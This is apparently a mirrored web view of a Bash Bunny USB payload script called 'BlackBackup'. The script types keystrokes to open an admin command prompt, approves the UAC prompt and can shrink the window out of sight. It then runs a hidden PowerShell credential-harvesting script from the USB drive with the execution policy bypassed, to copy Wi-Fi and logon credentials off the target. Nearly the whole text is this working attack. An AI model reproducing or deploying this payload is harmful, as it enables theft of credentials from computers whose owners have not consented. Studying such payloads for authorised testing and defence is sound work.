mirror of
https://github.com/hak5darren/bashbunny-payloads.git
synced 2025-10-29 16:58:12 +00:00
61 lines
1.4 KiB
Plaintext
61 lines
1.4 KiB
Plaintext
# Title: BlackBackup
|
|
# Author: JWHeuver & JBaselier
|
|
# Version: 1.0
|
|
#
|
|
# Runs powershell script to get Wlan and logon credentials
|
|
# from computer and save them on USB drive (Storage attack)
|
|
#
|
|
# Purple.............Loading
|
|
# Green .............Execute Credential Ripper Powershell
|
|
# Off................Finished
|
|
#
|
|
#!/bin/bash
|
|
|
|
# OPTIONS - More options available in the Powershell payload
|
|
OBFUSCATECMD="N" # Y=yes or N=no
|
|
|
|
# Source bunny_helpers.sh to get environment variable and switch_positions
|
|
source bunny_helpers.sh
|
|
|
|
#-----------------------------------
|
|
# Purple LED - initializing
|
|
LED R B 0
|
|
|
|
# Attackmode HID / Storage
|
|
ATTACKMODE HID STORAGE
|
|
|
|
#-----------------------------------
|
|
# Green LED - executing credential_powershell
|
|
LED G 0
|
|
|
|
QUACK GUI r
|
|
QUACK DELAY 300
|
|
QUACK STRING powershell Start-Process cmd -Verb runAs
|
|
QUACK ENTER
|
|
QUACK DELAY 4000
|
|
QUACK ALT y
|
|
QUACK ALT j
|
|
QUACK ENTER
|
|
QUACK DELAY 1000
|
|
|
|
# Obfuscate CMD?
|
|
if [ $OBFUSCATECMD == "Y" ]; then
|
|
QUACK STRING mode con:cols=20 lines=1
|
|
QUACK ENTER
|
|
QUACK DELAY 100
|
|
QUACK STRING color FE
|
|
QUACK ENTER
|
|
QUACK DELAY 100
|
|
fi
|
|
|
|
# Execute Attack
|
|
QUACK STRING powerShell -windowstyle hidden -ExecutionPolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\credentials.ps1')"
|
|
QUACK ENTER
|
|
QUACK DELAY 1000
|
|
QUACK STRING exit
|
|
QUACK ENTER
|
|
|
|
#-----------------------------------
|
|
# Kill the lights - finished
|
|
LED 0
|